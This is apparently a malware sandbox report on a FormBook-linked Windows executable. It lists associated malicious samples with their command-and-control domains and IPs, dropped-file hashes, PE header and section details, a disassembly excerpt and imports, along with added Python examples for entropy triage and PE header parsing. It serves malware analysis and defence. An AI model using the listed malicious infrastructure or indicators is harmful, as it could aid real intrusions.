    tfWjjV1LdT.exe | malicious | FormBook | 103.224.182.242
    M7XS5C07kV.exe | malicious | FormBook | 103.224.182.242
    PO2412010.exe | malicious | FormBook | 103.224.182.242
    Document_084462.scr.exe | malicious | FormBook, GuLoader | 103.224.182.242
    New Purchase Order.exe | malicious | FormBook | 103.224.182.242
    Purchase Order..exe | malicious | FormBook | 103.224.182.242
    YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | 103.224.182.242
www.brightvision.website
    YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | 203.161.42.73
    BASF Hung#U00e1ria Kft.exe | malicious | FormBook | 203.161.42.73
    Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | malicious | FormBook | 203.161.42.73
r0lqcud7.nbnnn.xyz
    02Eh1ah35H.exe | malicious | FormBook, GuLoader | 27.124.4.246
    1SxKeB4u0c.exe | malicious | FormBook | 23.225.160.132
    suBpo1g13Q.exe | malicious | FormBook | 23.225.159.42
    AxKxwW9WGa.exe | malicious | FormBook | 27.124.4.246
    tfWjjV1LdT.exe | malicious | FormBook | 27.124.4.246
    uG3I84bQEr.exe | malicious | FormBook | 23.225.159.42
    M7XS5C07kV.exe | malicious | FormBook | 202.79.161.151
    order confirmation.exe | malicious | FormBook | 27.124.4.246
    UPDATED CONTRACT.exe | malicious | FormBook | 23.225.159.42
    PO 4110007694.exe | malicious | FormBook | 27.124.4.246
www.zkdamdjj.shop
    02Eh1ah35H.exe | malicious | FormBook, GuLoader | 104.21.40.167
    suBpo1g13Q.exe | malicious | FormBook | 188.114.97.3
    AxKxwW9WGa.exe | malicious | FormBook | 188.114.96.3
    tfWjjV1LdT.exe | malicious | FormBook | 188.114.96.3
    5CTbduoXq4.exe | malicious | FormBook | 104.21.40.167
    M7XS5C07kV.exe | malicious | FormBook | 188.114.96.3
    KSts9xW7qy.exe | malicious | FormBook | 188.114.96.3
    Invoice 10493.exe | malicious | FormBook | 172.67.187.114
    Document_084462.scr.exe | malicious | FormBook, GuLoader | 172.67.187.114
    YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | 172.67.187.114
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US
    8L6MBxaJ2m.exe | malicious | FormBook | 13.248.169.48
    6.elf | malicious | Unknown | 54.122.159.233
    SH4.elf | malicious | Unknown | 54.171.230.55
    3.elf | malicious | Unknown | 13.214.70.119
    z6tNjJC614.exe | malicious | FormBook | 13.248.169.48
    5.elf | malicious | Unknown | 44.238.49.226
    rACq8Eaix6.exe | malicious | FormBook | 13.248.169.48
    ty1nyFUMlo.exe | malicious | Snake Keylogger, VIP Keylogger | 3.130.71.34
    plZuPtZoTk.exe | malicious | FormBook | 54.67.87.110
    ARMV4L.elf | malicious | Unknown | 54.171.230.55
YURTEH-ASUA
    AxKxwW9WGa.exe | malicious | FormBook | 45.141.156.114
    6.elf | malicious | Unknown | 152.89.63.57
    tfWjjV1LdT.exe | malicious | FormBook | 45.141.156.114
    M7XS5C07kV.exe | malicious | FormBook | 45.141.156.114
    http://www.efnhdh.blogspot.mk/ | malicious | GRQ Scam | 152.89.61.96
    https://alluc.co/watch-movies/passengers.html | malicious | Unknown | 31.42.184.242
    Recibos.exe | malicious | FormBook | 45.141.156.114
    YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | 45.141.156.114
    BASF Hung#U00e1ria Kft.exe | malicious | FormBook | 45.141.156.114
    CV_ Filipa Barbosa.exe | malicious | FormBook | 45.141.156.114
INTERHOPCA
    bIcqeSVPW6.exe | malicious | FormBook | 165.154.96.210
    AxKxwW9WGa.exe | malicious | FormBook | 165.154.96.210
    tfWjjV1LdT.exe | malicious | FormBook | 165.154.96.210
    M7XS5C07kV.exe | malicious | FormBook | 165.154.96.210
    arm4.elf | malicious | Mirai | 165.154.119.54
    i686.elf | malicious | Mirai | 165.154.144.14
    la.bot.powerpc.elf | malicious | Unknown | 165.154.119.65
    sh4.elf | malicious | Mirai | 165.154.120.14
    https://mj.ostep.net/acknowledgements | malicious | Unknown | 165.154.182.38
    firmware.mipsel.elf | malicious | Unknown | 165.154.232.175
                                                                              Process:C:\Windows\SysWOW64\mobsync.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.1209886597424439
                                                                              Encrypted:false
                                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\qbSIgCrCgw.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287232
                                                                              Entropy (8bit):7.9951456805712535
                                                                              Encrypted:true
                                                                              SSDEEP:6144:E6l7sN894VVdIdT7OHROzYBCKtBHW65iDHGeiUljSqSaB0gxBXwWrl+o:R8g4LNHuYBCA5Vwl5BrxBAKAo
                                                                              MD5:60DA3C5734ADC25F78600BE77434D88C
                                                                              SHA1:447B5CAFCFDA9B7EF6997DFB1670DE369D03EC4D
                                                                              SHA-256:2B2B19222E0C610331CD073CAF812C0C96BBD4B8872FA358ED800DA92E6F642F
                                                                              SHA-512:5B4010C91ECC7873BB68A0ECDDF91FB5E01B952F1465E1099B38D5450E61D2A946995BB08459FAFD1A5CBF61BF0B06F04F4ED62038BED122C0575A7C6901B457
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.j.XEDJ7U57G..RI.HUXJMC6v8EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFD.7Q59X.HR.@.t.K...bP,;.>*)#8V<.T&&(==i*0x88-._Ve...x++.R.8:MlFRIIHUX3LJ..X"...?.y*P./..|2..R..q#Q."...r8!..^2].'/.RIIHUXJM.s68.I1N.n.*7Q57GHFR.IJTSKFC6f<EH0NXFDJ7.!7GHVRII(QXJM.66(EH0LXFBJ7Q57GH@RIIHUXJM#268GH0NXFDH7..7GXFRYIHUXZMC&68EH0NHFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EfD+ 2DJ7%{3GHVRII.QXJ]C668EH0NXFDJ7Q.7G(FRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH
                                                                              Process:C:\Users\user\Desktop\qbSIgCrCgw.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287232
                                                                              Entropy (8bit):7.9951456805712535
                                                                              Encrypted:true
                                                                              SSDEEP:6144:E6l7sN894VVdIdT7OHROzYBCKtBHW65iDHGeiUljSqSaB0gxBXwWrl+o:R8g4LNHuYBCA5Vwl5BrxBAKAo
                                                                              MD5:60DA3C5734ADC25F78600BE77434D88C
                                                                              SHA1:447B5CAFCFDA9B7EF6997DFB1670DE369D03EC4D
                                                                              SHA-256:2B2B19222E0C610331CD073CAF812C0C96BBD4B8872FA358ED800DA92E6F642F
                                                                              SHA-512:5B4010C91ECC7873BB68A0ECDDF91FB5E01B952F1465E1099B38D5450E61D2A946995BB08459FAFD1A5CBF61BF0B06F04F4ED62038BED122C0575A7C6901B457
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.j.XEDJ7U57G..RI.HUXJMC6v8EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFD.7Q59X.HR.@.t.K...bP,;.>*)#8V<.T&&(==i*0x88-._Ve...x++.R.8:MlFRIIHUX3LJ..X"...?.y*P./..|2..R..q#Q."...r8!..^2].'/.RIIHUXJM.s68.I1N.n.*7Q57GHFR.IJTSKFC6f<EH0NXFDJ7.!7GHVRII(QXJM.66(EH0LXFBJ7Q57GH@RIIHUXJM#268GH0NXFDH7..7GXFRYIHUXZMC&68EH0NHFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EfD+ 2DJ7%{3GHVRII.QXJ]C668EH0NXFDJ7Q.7G(FRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH0NXFDJ7Q57GHFRIIHUXJMC668EH
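The dropped-file entries above carry an "Entropy (8bit)" score and an "Encrypted" verdict: the SQLite database written by mobsync.exe scores 1.12 and is not flagged, while the two 287232-byte blobs written by qbSIgCrCgw.exe score 7.995 (just under the 8.0 ceiling) and are flagged encrypted. The following is an added example, not Joe Sandbox code, that recomputes that triage from raw bytes. The 7.9 cutoff and the magic-byte sniffing are this example's own assumptions (the report does not state the cutoff it uses); the two sample inputs are constructed here and are not the report's files.

```python
# Added example, not Joe Sandbox code: recompute the "Entropy (8bit)" and
# "Encrypted" verdicts shown for dropped files. The 7.9 cutoff and the
# magic-byte sniffing are assumptions made for this example.
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def sniff_type(data: bytes) -> str:
    """Minimal magic-byte check covering the two file types that appear in this report."""
    if data.startswith(b"SQLite format 3\x00"):
        return "SQLite 3.x database"
    if data.startswith(b"MZ"):
        return "PE/DOS executable"
    return "data"


def triage(name: str, data: bytes, threshold: float = 7.9) -> dict:
    """Flag a dropped file as probably encrypted or packed when its entropy sits near the 8.0 ceiling.

    A near-8.0 blob with no recognisable header (type "data") is the usual shape
    of an encrypted second stage written next to the loader; a copied SQLite
    database is mostly zero-filled pages and scores low.
    """
    ent = shannon_entropy(data)
    return {
        "name": name,
        "type": sniff_type(data),
        "size": len(data),
        "entropy": round(ent, 4),
        "encrypted": ent >= threshold,
    }


def triage_all(files: dict) -> list:
    """Return the names of the dropped files that look encrypted, in the order given."""
    return [name for name, data in files.items() if triage(name, data)["encrypted"]]


# Constructed sample inputs (not the report's files): a mostly empty 2048-byte
# SQLite page and a 64 KiB pseudo-random blob built from a SHA-256 counter so
# the run is deterministic and needs no network or disk access.
SQLITE_SAMPLE = b"SQLite format 3\x00" + b"\x00" * (2048 - 16)
RANDOM_SAMPLE = b"".join(
    hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(2048)
)


if __name__ == "__main__":
    for entry_name, blob in {"browser.db": SQLITE_SAMPLE, "payload.bin": RANDOM_SAMPLE}.items():
        print(triage(entry_name, blob))
```

Entropy alone does not distinguish encryption from compression or from an already-packed PE, which is why `triage` also reports the sniffed type: a near-8.0 "data" blob next to a low-entropy loader is the pattern worth carving out and decrypting, whereas a high-entropy file with a valid header is more likely a legitimate archive or image.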
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.1564384844054825
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:qbSIgCrCgw.exe
                                                                              File size:1'223'168 bytes
                                                                              MD5:8057aaa332a2045b3acb5040bad45772
                                                                              SHA1:224c921be20a4e4c3b627f0dc01bd5c896ca122b
                                                                              SHA256:bb04679008a1ac6bcd8ca7ff7470e0ee72450562fd87be1e0b8111f0e7ef2d76
                                                                              SHA512:6215152720aab91a7f4ed09d444cac7a44a9f053c2adc5f8a2cedf8ac874c4db042183213020e57175719233f1b1a7659bde6337e6dec1b66c4c2c4607732773
                                                                              SSDEEP:24576:1tb20pkaCqT5TBWgNQ7aHfIuPco8vnw9na4ntkCLuYwq/ch6A:mVg5tQ7aHgNpvnwpjz/85
                                                                              TLSH:D745CF1273DE8361C3B25273BA25B701BEBF782506A1F96B2FD4093DF920162525E673
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                              Icon Hash:aaf3e3e3938382a0
                                                                              Entrypoint:0x425f74
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6749071D [Fri Nov 29 00:13:17 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:3d95adbf13bbe79dc24dccb401c12091
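The static fields above (Entrypoint 0x425f74, Imagebase 0x400000, Time Stamp 0x6749071D, Image File Characteristics, DLL Characteristics, Subsystem and the 5.1 OS/subsystem versions) all come from IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER32. The block below is an added example, not Joe Sandbox code, that walks those structures with `struct` and decodes the flags; note that the report's DLL Characteristics list DYNAMIC_BASE and TERMINAL_SERVER_AWARE but not NX_COMPAT, so the parser exposes that bit explicitly. The in-memory image it builds is constructed to carry the same header values the report shows and is not the real sample; the flag tables cover only the bits relevant here.

```python
# Added example, not Joe Sandbox code: decode the PE32 header fields a sandbox
# report lists (entry point, image base, link timestamp, characteristics,
# subsystem, versions). The test image is constructed to mirror the report's
# values; it is not the analysed sample.
import datetime
import struct

IMAGE_FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}


def _flags(value: int, table: dict) -> list:
    """Names of the bits set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32_header(data: bytes) -> dict:
    """Walk IMAGE_DOS_HEADER -> PE signature -> IMAGE_FILE_HEADER -> IMAGE_OPTIONAL_HEADER32."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4  # IMAGE_FILE_HEADER, 20 bytes
    machine, nsections, timestamp, _symtab, _nsyms, _opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, fh
    )
    oh = fh + 20  # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, oh)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", data, oh + 16)[0]
    image_base = struct.unpack_from("<I", data, oh + 28)[0]
    os_major, os_minor, img_major, img_minor, ss_major, ss_minor = struct.unpack_from("<6H", data, oh + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, oh + 68)
    built = datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc)
    return {
        "machine": hex(machine),
        "sections": nsections,
        "entrypoint": hex(image_base + entry_rva),  # VA, as the report prints it
        "imagebase": hex(image_base),
        "timestamp": f"{timestamp:#x} [{built:%a %b %d %H:%M:%S %Y} UTC]",
        "characteristics": _flags(characteristics, IMAGE_FILE_CHARACTERISTICS),
        "dll_characteristics": _flags(dll_chars, DLL_CHARACTERISTICS),
        "subsystem": SUBSYSTEMS.get(subsystem, hex(subsystem)),
        "os_version": f"{os_major}.{os_minor}",
        "image_version": f"{img_major}.{img_minor}",
        "subsystem_version": f"{ss_major}.{ss_minor}",
        "nx_compat": bool(dll_chars & 0x0100),  # absent in this report's sample
    }


def build_sample_image() -> bytes:
    """Constructed minimal PE32 header (no sections, no imports) carrying the report's values."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature follows the DOS header
    # Machine i386, 1 section, TimeDateStamp, no symbols, 0xE0 optional header,
    # Characteristics = EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | 32BIT_MACHINE
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0x6749071D, 0, 0, 0xE0, 0x0122)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 16, 0x25F74)             # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)            # ImageBase
    struct.pack_into("<6H", opt, 40, 5, 1, 5, 1, 5, 1)   # OS, image and subsystem versions 5.1
    struct.pack_into("<HH", opt, 68, 2, 0x8040)          # GUI; DYNAMIC_BASE | TERMINAL_SERVER_AWARE
    return bytes(dos) + b"PE\x00\x00" + file_hdr + bytes(opt)


if __name__ == "__main__":
    for key, value in parse_pe32_header(build_sample_image()).items():
        print(f"{key}: {value}")
```

Reading the header directly, rather than trusting the report's rendering, is what lets a responder confirm the two triage signals hidden in these fields: a link timestamp (Nov 29 2024) that can be compared against first-seen dates for the associated samples, and an ASLR-enabled image that opted out of DEP (no NX_COMPAT) and targets OS version 5.1, which is unusual for legitimately built modern software.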
                                                                              Instruction
                                                                              call 00007F033CD8992Fh
                                                                              jmp 00007F033CD7C944h
                                                                              int3
                                                                              int3
                                                                              push edi
                                                                              push esi
                                                                              mov esi, dword ptr [esp+10h]
                                                                              mov ecx, dword ptr [esp+14h]
                                                                              mov edi, dword ptr [esp+0Ch]
                                                                              mov eax, ecx
                                                                              mov edx, ecx
                                                                              add eax, esi
                                                                              cmp edi, esi
                                                                              jbe 00007F033CD7CACAh
                                                                              cmp edi, eax
                                                                              jc 00007F033CD7CE2Eh
                                                                              bt dword ptr [004C0158h], 01h
                                                                              jnc 00007F033CD7CAC9h
                                                                              rep movsb
                                                                              jmp 00007F033CD7CDDCh
                                                                              cmp ecx, 00000080h
                                                                              jc 00007F033CD7CC94h
                                                                              mov eax, edi
                                                                              xor eax, esi
                                                                              test eax, 0000000Fh
                                                                              jne 00007F033CD7CAD0h
                                                                              bt dword ptr [004BA370h], 01h
                                                                              jc 00007F033CD7CFA0h
                                                                              bt dword ptr [004C0158h], 00000000h
                                                                              jnc 00007F033CD7CC6Dh
                                                                              test edi, 00000003h
                                                                              jne 00007F033CD7CC7Eh
                                                                              test esi, 00000003h
                                                                              jne 00007F033CD7CC5Dh
                                                                              bt edi, 02h
                                                                              jnc 00007F033CD7CACFh
                                                                              mov eax, dword ptr [esi]
                                                                              sub ecx, 04h
                                                                              lea esi, dword ptr [esi+04h]
                                                                              mov dword ptr [edi], eax
                                                                              lea edi, dword ptr [edi+04h]
                                                                              bt edi, 03h
                                                                              jnc 00007F033CD7CAD3h
                                                                              movq xmm1, qword ptr [esi]
                                                                              sub ecx, 08h
                                                                              lea esi, dword ptr [esi+08h]
                                                                              movq qword ptr [edi], xmm1
                                                                              lea edi, dword ptr [edi+08h]
                                                                              test esi, 00000007h
                                                                              je 00007F033CD7CB25h
                                                                              bt esi, 03h
                                                                              jnc 00007F033CD7CB78h
                                                                              movdqa xmm1, dqword ptr [esi+00h]
                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [ASM] VS2012 UPD4 build 61030
                                                                              • [RES] VS2012 UPD4 build 61030
                                                                              • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x61984 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x126000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x61984 | 0x61a00 | 69692a46b9d66fff68b6bd059c710abf | False | 0.9330385723431498 | data | 7.9052797595336415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x126000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x58c8b | data | | | 1.0003327292876019
RT_GROUP_ICON | 0x125444 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1254bc | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1254d0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1254e4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1254f8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1255d4 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
